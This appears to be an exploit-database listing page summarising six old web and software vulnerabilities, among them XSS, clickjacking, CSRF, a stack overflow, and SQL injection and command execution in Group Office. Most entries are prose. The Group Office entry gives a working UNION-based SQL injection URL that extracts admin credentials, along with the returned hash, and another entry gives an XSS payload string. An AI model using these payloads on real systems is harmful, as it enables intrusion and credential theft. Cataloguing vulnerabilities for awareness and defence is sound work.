header-logo
Suggest Exploit
explore-vulnerabilities

Explore Vulnerabilities

Version
Year

Explore all Exploits:

Freelancers Marketplace Script Persistent XSS Vulnerability

Freelancers Marketplace Script is an Extensive and Powerful script written in PHP and Ajax to launch your own Freelancers website. The attacker can insert xss scripts in the 'title' and the 'describe project' area. Attack Pattern: '>><marquee><h1>XSS3d By Sid3^effects</h1><marquee>'

Netscape Browser (V9.0.0.6) Clickjacking

Netscape Browser (V9.0.0.6) is vulnerable to clickjacking. An attacker can use this vulnerability to trick users into clicking on malicious links or buttons. This vulnerability can be exploited by an attacker to perform malicious actions on behalf of the user.

Group Office Remote SQL Injection Vulnerability

Remote attacker can inject sql codes to the system that host target web application. Its high level vulnerability. In json.php 'get_comment' method called with value of HTTP Request that's name 'comment_id'. In the 'get_comment' method, variable '$comment_id' inserted to sql query and executed by application. Request: http://server/groupoffice/modules/comments/json.php?task=comment&comment_id=888881+union+select+1,2,3,4,5,6,(select+concat_ws(0x3a,username,password)+from+go_users+where+id=1) Response: {"data":{"id":"1","link_id":"2","link_type":"3","user_id":"4","ctime":"01-01-1970 1:00","mtime":"01-01-1970 1:00","comments":"admin:$1$sM5wjKS9$wJPfZZWO53uu8eCxjOesS/","user_name":""},"success":true}

ActiTime 2.0 MA CSRF Vulnerability

ActiTime 2.0 MA is vulnerable to Cross Site Request Forgery (CSRF). The application does not verify the origin of the request when performing certain actions. This allows an attacker to perform certain actions on behalf of a logged in user, without the user's knowledge. The following actions are vulnerable: Create a new user, Delete a user, Change user password.

Group Office Remote Command Execution Vulnerability

Remote attacker can execute commands on the system that host target web application. Its high level vulnerability. Attacker needs gnupg module that installed. In json.php export method called with HTTP Request that's name fingerprint. In the export method, variable $fingerprint passed to run_cmd method.

Novell Groupwise Internet Agent Stack Overflow

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installatons of Novell Groupwise Internet Agent. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the HTTP POST request. By sending a specially crafted request, an attacker can cause a stack-based buffer overflow. An attacker can leverage this vulnerability to execute arbitrary code under the context of the user running the application.

Recent Exploits: